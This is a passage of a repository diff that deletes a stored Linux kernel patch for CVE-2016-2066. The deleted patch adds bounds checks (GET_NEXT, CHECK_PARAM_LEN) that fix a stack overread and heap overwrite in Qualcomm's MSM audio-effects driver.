-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t idx;
-+		int j;
- 		switch (command_id) {
- 		case EQ_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -781,17 +1045,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = eq->enable_flag;
--			eq->enable_flag = *values++;
-+			eq->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_ENABLE prev:%d new:%d\n", __func__,
- 				prev_enable_flag, eq->enable_flag);
- 			if (prev_enable_flag != eq->enable_flag) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_ENABLE", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_ENABLE;
--				*updt_params++ = EQ_ENABLE_PARAM_SZ;
--				*updt_params++ = eq->enable_flag;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_ENABLE;
-+				*updt_params++ =
- 					EQ_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+					eq->enable_flag;
- 			}
- 			break;
- 		case EQ_CONFIG:
-@@ -805,9 +1078,12 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				eq->config.eq_pregain, eq->config.preset_id);
- 			for (idx = 0; idx < MAX_EQ_BANDS; idx++)
- 				eq->per_band_cfg[idx].band_idx = -1;
--			eq->config.eq_pregain = *values++;
--			eq->config.preset_id = *values++;
--			eq->config.num_bands = *values++;
-+			eq->config.eq_pregain =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.preset_id =
-+				GET_NEXT(values, param_max_offset, rc);
-+			eq->config.num_bands =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (eq->config.num_bands > MAX_EQ_BANDS) {
- 				pr_err("EQ_CONFIG:invalid num of bands\n");
- 				rc = -EINVAL;
-@@ -822,48 +1098,59 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			for (j = 0; j < eq->config.num_bands; j++) {
--				idx = *values++;
-+				idx = GET_NEXT(values, param_max_offset, rc);
- 				if (idx >= MAX_EQ_BANDS) {
- 					pr_err("EQ_CONFIG:invalid band index\n");
- 					rc = -EINVAL;
- 					goto invalid_config;
- 				}
- 				eq->per_band_cfg[idx].band_idx = idx;
--				eq->per_band_cfg[idx].filter_type = *values++;
-+				eq->per_band_cfg[idx].filter_type =
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].freq_millihertz =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].gain_millibels =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 				eq->per_band_cfg[idx].quality_factor =
--								*values++;
-+					GET_NEXT(values, param_max_offset, rc);
- 			}
- 			if (command_config_state == CONFIG_SET) {
- 				int config_param_length = EQ_CONFIG_PARAM_SZ +
- 					(EQ_CONFIG_PER_BAND_PARAM_SZ*
- 					 eq->config.num_bands);
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						config_param_length;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_CONFIG", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
--				*updt_params++ = AUDPROC_PARAM_ID_EQ_CONFIG;
--				*updt_params++ = config_param_length;
--				*updt_params++ = eq->config.eq_pregain;
--				*updt_params++ = eq->config.preset_id;
--				*updt_params++ = eq->config.num_bands;
-+				*updt_params++ =
-+					AUDPROC_PARAM_ID_EQ_CONFIG;
-+				*updt_params++ =
-+					config_param_length;
-+				*updt_params++ =
-+					eq->config.eq_pregain;
-+				*updt_params++ =
-+					eq->config.preset_id;
-+				*updt_params++ =
-+					eq->config.num_bands;
- 				for (idx = 0; idx < MAX_EQ_BANDS; idx++) {
- 					if (eq->per_band_cfg[idx].band_idx < 0)
- 						continue;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].filter_type;
-+					eq->per_band_cfg[idx].filter_type;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].freq_millihertz;
-+					eq->per_band_cfg[idx].freq_millihertz;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].gain_millibels;
-+					eq->per_band_cfg[idx].gain_millibels;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].quality_factor;
-+					eq->per_band_cfg[idx].quality_factor;
- 					*updt_params++ =
--					  eq->per_band_cfg[idx].band_idx;
-+					eq->per_band_cfg[idx].band_idx;
- 				}
--				params_length += COMMAND_PAYLOAD_SZ +
--						config_param_length;
- 			}
- 			break;
- 		case EQ_BAND_INDEX:
-@@ -872,7 +1159,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			idx = *values++;
-+			idx = GET_NEXT(values, param_max_offset, rc);
- 			if (idx > MAX_EQ_BANDS) {
- 				pr_err("EQ_BAND_INDEX:invalid band index\n");
- 				rc = -EINVAL;
-@@ -882,14 +1169,21 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			pr_debug("%s: EQ_BAND_INDEX val:%d\n",
- 				__func__, eq->band_index);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_BAND_INDEX_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_BAND_INDEX", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_BAND_INDEX;
--				*updt_params++ = EQ_BAND_INDEX_PARAM_SZ;
--				*updt_params++ = eq->band_index;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_BAND_INDEX_PARAM_SZ;
-+				*updt_params++ =
-+					eq->band_index;
- 			}
- 			break;
- 		case EQ_SINGLE_BAND_FREQ:
-@@ -902,18 +1196,26 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 				pr_err("EQ_SINGLE_BAND_FREQ:invalid index\n");
- 				break;
- 			}
--			eq->freq_millihertz = *values++;
-+			eq->freq_millihertz =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: EQ_SINGLE_BAND_FREQ idx:%d, val:%d\n",
- 				__func__, eq->band_index, eq->freq_millihertz);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"EQ_SINGLE_BAND_FREQ", rc);
-+				if (rc != 0)
-+					break;
- 				*updt_params++ =
- 					AUDPROC_MODULE_ID_POPLESS_EQUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_EQ_SINGLE_BAND_FREQ;
--				*updt_params++ = EQ_SINGLE_BAND_FREQ_PARAM_SZ;
--				*updt_params++ = eq->freq_millihertz;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					EQ_SINGLE_BAND_FREQ_PARAM_SZ;
-+				*updt_params++ =
-+					eq->freq_millihertz;
- 			}
- 			break;
- 		default:
-@@ -921,7 +1223,7 @@ int msm_audio_effects_popless_eq_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -938,9 +1240,10 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- {
- 	int devices;
- 	int num_commands;
--	char *params;
-+	char *params = NULL;
- 	int *updt_params, i;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
-+	long *param_max_offset;
- 	int rc = 0;
- 
- 	pr_debug("%s: instance: %d\n", __func__, instance);
-@@ -949,9 +1252,11 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			__func__);
- 		return -EINVAL;
- 	}
--	if (!ac) {
--		pr_err("%s: cannot set audio effects as audio client is NULL\n",
--			__func__);
-+	param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	devices = GET_NEXT(values, param_max_offset, rc);
-+	num_commands = GET_NEXT(values, param_max_offset, rc);
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
-+		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
- 	params = kzalloc(params_length, GFP_KERNEL);
-@@ -959,88 +1264,114 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 		pr_err("%s, params memory alloc failed\n", __func__);
- 		return -ENOMEM;
- 	}
--	devices = *values++;
--	num_commands = *values++;
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case SOFT_VOLUME_GAIN_2CH:
- 		case SOFT_VOLUME2_GAIN_2CH:
- 			if (length != 2 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_2CH/VOLUME2_GAIN_2CH:invalid params\n");
-+				pr_err("VOLUME_GAIN_2CH: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			vol->left_gain = *values++;
--			vol->right_gain = *values++;
-+			vol->left_gain = GET_NEXT(values, param_max_offset, rc);
-+			vol->right_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			vol->master_gain = 0x2000;
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_2CH",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		case SOFT_VOLUME_GAIN_MASTER:
- 		case SOFT_VOLUME2_GAIN_MASTER:
- 			if (length != 1 || index_offset != 0) {
--				pr_err("VOLUME_GAIN_MASTER/VOLUME2_GAIN_MASTER:invalid params\n");
-+				pr_err("VOLUME_GAIN_MASTER: invalid params\n");
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
- 			vol->left_gain = 0x2000;
- 			vol->right_gain = 0x2000;
--			vol->master_gain = *values++;
-+			vol->master_gain =
-+				GET_NEXT(values, param_max_offset, rc);
- 			if (command_config_state == CONFIG_SET) {
-+				params_length += COMMAND_PAYLOAD_SZ +
-+						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VOLUME/VOLUME2_GAIN_MASTER",
-+						rc);
-+				if (rc != 0)
-+					break;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_LR_CHANNEL_GAIN;
--				*updt_params++ = SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
--				*updt_params++ = (vol->left_gain << 16) |
--						 vol->right_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--						SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					SOFT_VOLUME_GAIN_2CH_PARAM_SZ;
-+				*updt_params++ =
-+					(vol->left_gain << 16) |
-+						vol->right_gain;
- 				if (instance == SOFT_VOLUME_INSTANCE_2)
- 					*updt_params++ =
--							ASM_MODULE_ID_VOL_CTRL2;
-+						ASM_MODULE_ID_VOL_CTRL2;
- 				else
--					*updt_params++ = ASM_MODULE_ID_VOL_CTRL;
-+					*updt_params++ =
-+						ASM_MODULE_ID_VOL_CTRL;
- 				*updt_params++ =
- 					ASM_PARAM_ID_VOL_CTRL_MASTER_GAIN;
- 				*updt_params++ =
- 					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
--				*updt_params++ = vol->master_gain;
--				params_length += COMMAND_PAYLOAD_SZ +
--					SOFT_VOLUME_GAIN_MASTER_PARAM_SZ;
-+				*updt_params++ =
-+					vol->master_gain;
- 			}
- 			break;
- 		default:
-@@ -1049,7 +1380,7 @@ static int __msm_audio_effects_volume_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length)
-+	if (params_length && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- invalid_config:
-diff --git a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-index f814434..b4bd43d 100644
---- a/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c
-@@ -2839,7 +2839,7 @@ static int msm_compr_audio_effects_config_info(struct snd_kcontrol *kcontrol,
- 					       struct snd_ctl_elem_info *uinfo)
- {
- 	uinfo->type = SNDRV_CTL_ELEM_TYPE_INTEGER;
--	uinfo->count = 128;
-+	uinfo->count = MAX_PP_PARAMS_SZ;
- 	uinfo->value.integer.min = 0;
- 	uinfo->value.integer.max = 0xFFFFFFFF;
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch
deleted file mode 100644
index 06b77eb4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2066/ANY/0001.patch
+++ /dev/null
@@ -1,1511 +0,0 @@
-From 775fca8289eff931f91ff6e8c36cf2034ba59e88 Mon Sep 17 00:00:00 2001
-From: Weiyin Jiang <wjiang@codeaurora.org>
-Date: Wed, 16 Mar 2016 12:51:03 +0800
-Subject: ASoC: msm: audio-effects: fix stack overread and heap overwrite
-
-Fix overwrite of updt_params allocated in heap, and stack overread
-where param pointer is passed from user space.
-
-CRs-Fixed: 989628
-Change-Id: Ida8bdb7da2fcb97023dce3b6eafe4b899a51cb66
-Signed-off-by: Weiyin Jiang <wjiang@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c |   3 +-
- include/sound/msm-audio-effects-q6-v2.h         |   4 +-
- sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c | 835 +++++++++++++++++-------
- sound/soc/msm/qdsp6v2/msm-compress-q6-v2.c      |   2 +-
- 4 files changed, 588 insertions(+), 256 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index c100c47..3ba20ca 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -20,7 +20,6 @@
- #include <sound/msm-dts-eagle.h>
- 
- #define MAX_CHANNELS_SUPPORTED		8
--#define MAX_PP_PARAMS_SZ		128
- #define WAIT_TIMEDOUT_DURATION_SECS	1
- 
- struct q6audio_effects {
-diff --git a/include/sound/msm-audio-effects-q6-v2.h b/include/sound/msm-audio-effects-q6-v2.h
-index cbdea32..6bc2338 100644
---- a/include/sound/msm-audio-effects-q6-v2.h
-+++ b/include/sound/msm-audio-effects-q6-v2.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -16,6 +16,8 @@
- 
- #include <sound/audio_effects.h>
- 
-+#define MAX_PP_PARAMS_SZ   128
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology);
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-index e26c453..1c08842 100644
---- a/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-audio-effects-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -20,6 +20,24 @@
- 
- #define MAX_ENABLE_CMD_SIZE 32
- 
-+#define GET_NEXT(ptr, upper_limit, rc)                                  \
-+({                                                                      \
-+	if (((ptr) + 1) > (upper_limit)) {                              \
-+		pr_err("%s: param list out of boundary\n", __func__);   \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+	((rc) == 0) ? *(ptr)++ :  -EINVAL;                              \
-+})
-+
-+#define CHECK_PARAM_LEN(len, max_len, tag, rc)                          \
-+do {                                                                    \
-+	if ((len) > (max_len)) {                                        \
-+		pr_err("%s: params length overflows\n", (tag));         \
-+		(rc) = -EINVAL;                                         \
-+	}                                                               \
-+} while (0)
-+
-+
- bool msm_audio_effects_is_effmodule_supp_in_top(int effect_module,
- 						int topology)
- {
-@@ -109,15 +127,16 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				struct virtualizer_params *virtualizer,
- 				long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -130,10 +149,14 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case VIRTUALIZER_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -142,17 +165,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = virtualizer->enable_flag;
--			virtualizer->enable_flag = *values++;
-+			virtualizer->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:VIRT ENABLE prev:%d, new:%d\n", __func__,
- 				prev_enable_flag, virtualizer->enable_flag);
- 			if (prev_enable_flag != virtualizer->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--					AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
--				*updt_params++ = VIRTUALIZER_ENABLE_PARAM_SZ;
--				*updt_params++ = virtualizer->enable_flag;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_ENABLE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT ENABLE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_ENABLE;
-+				*updt_params++ =
-+				VIRTUALIZER_ENABLE_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->enable_flag;
- 			}
- 			break;
- 		case VIRTUALIZER_STRENGTH:
-@@ -161,17 +193,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->strength = *values++;
-+			virtualizer->strength =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT STRENGTH val: %d\n",
- 					__func__, virtualizer->strength);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT STRENGTH", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_STRENGTH;
--				*updt_params++ = VIRTUALIZER_STRENGTH_PARAM_SZ;
--				*updt_params++ = virtualizer->strength;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_STRENGTH_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->strength;
- 			}
- 			break;
- 		case VIRTUALIZER_OUT_TYPE:
-@@ -180,17 +221,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->out_type = *values++;
-+			virtualizer->out_type =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT OUT_TYPE val:%d\n",
- 				__func__, virtualizer->out_type);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
-+				params_length += COMMAND_PAYLOAD_SZ +
-+					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT OUT_TYPE", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+					AUDPROC_MODULE_ID_VIRTUALIZER;
- 				*updt_params++ =
- 					AUDPROC_PARAM_ID_VIRTUALIZER_OUT_TYPE;
--				*updt_params++ = VIRTUALIZER_OUT_TYPE_PARAM_SZ;
--				*updt_params++ = virtualizer->out_type;
--				params_length += COMMAND_PAYLOAD_SZ +
-+				*updt_params++ =
- 					VIRTUALIZER_OUT_TYPE_PARAM_SZ;
-+				*updt_params++ =
-+					virtualizer->out_type;
- 			}
- 			break;
- 		case VIRTUALIZER_GAIN_ADJUST:
-@@ -199,18 +249,26 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 				rc = -EINVAL;
- 				goto invalid_config;
- 			}
--			virtualizer->gain_adjust = *values++;
-+			virtualizer->gain_adjust =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s: VIRT GAIN_ADJUST val:%d\n",
- 				__func__, virtualizer->gain_adjust);
- 			if (command_config_state == CONFIG_SET) {
--				*updt_params++ = AUDPROC_MODULE_ID_VIRTUALIZER;
--				*updt_params++ =
--				       AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
--				*updt_params++ =
--					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
--				*updt_params++ = virtualizer->gain_adjust;
- 				params_length += COMMAND_PAYLOAD_SZ +
- 					VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				CHECK_PARAM_LEN(params_length,
-+						MAX_INBAND_PARAM_SZ,
-+						"VIRT GAIN_ADJUST", rc);
-+				if (rc != 0)
-+					break;
-+				*updt_params++ =
-+				AUDPROC_MODULE_ID_VIRTUALIZER;
-+				*updt_params++ =
-+				AUDPROC_PARAM_ID_VIRTUALIZER_GAIN_ADJUST;
-+				*updt_params++ =
-+				VIRTUALIZER_GAIN_ADJUST_PARAM_SZ;
-+				*updt_params++ =
-+				virtualizer->gain_adjust;
- 			}
- 			break;
- 		default:
-@@ -218,7 +276,7 @@ int msm_audio_effects_virtualizer_handler(struct audio_client *ac,
- 			break;
- 		}
- 	}
--	if (params_length && !msm_dts_eagle_is_hpx_on())
-+	if (params_length && !msm_dts_eagle_is_hpx_on() && (rc == 0))
- 		q6asm_send_audio_effects_params(ac, params,
- 						params_length);
- 	else
-@@ -232,15 +290,16 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				     struct reverb_params *reverb,
- 				     long *values)
- {
--	int devices = *values++;
--	int num_commands = *values++;
--	char *params;
-+	long *param_max_offset = values + MAX_PP_PARAMS_SZ - 1;
-+	char *params = NULL;
-+	int rc = 0;
-+	int devices = GET_NEXT(values, param_max_offset, rc);
-+	int num_commands = GET_NEXT(values, param_max_offset, rc);
- 	int *updt_params, i, prev_enable_flag;
- 	uint32_t params_length = (MAX_INBAND_PARAM_SZ);
--	int rc = 0;
- 
- 	pr_debug("%s\n", __func__);
--	if (!ac) {
-+	if (!ac || (devices == -EINVAL) || (num_commands == -EINVAL)) {
- 		pr_err("%s: cannot set audio effects\n", __func__);
- 		return -EINVAL;
- 	}
-@@ -253,10 +312,14 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 	updt_params = (int *)params;
- 	params_length = 0;
- 	for (i = 0; i < num_commands; i++) {
--		uint32_t command_id = *values++;
--		uint32_t command_config_state = *values++;
--		uint32_t index_offset = *values++;
--		uint32_t length = *values++;
-+		uint32_t command_id =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t command_config_state =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t index_offset =
-+			GET_NEXT(values, param_max_offset, rc);
-+		uint32_t length =
-+			GET_NEXT(values, param_max_offset, rc);
- 		switch (command_id) {
- 		case REVERB_ENABLE:
- 			if (length != 1 || index_offset != 0) {
-@@ -265,16 +328,26 @@ int msm_audio_effects_reverb_handler(struct audio_client *ac,
- 				goto invalid_config;
- 			}
- 			prev_enable_flag = reverb->enable_flag;
--			reverb->enable_flag = *values++;
-+			reverb->enable_flag =
-+				GET_NEXT(values, param_max_offset, rc);
- 			pr_debug("%s:REVERB_ENABLE prev:%d,new:%d\n", __func__,
- 					prev_enable_flag, reverb->enable_flag);
- 			if (prev_enable_flag != reverb->enable_flag) {
--				*updt_params++ = AUDPROC_MODULE_ID_REVERB;
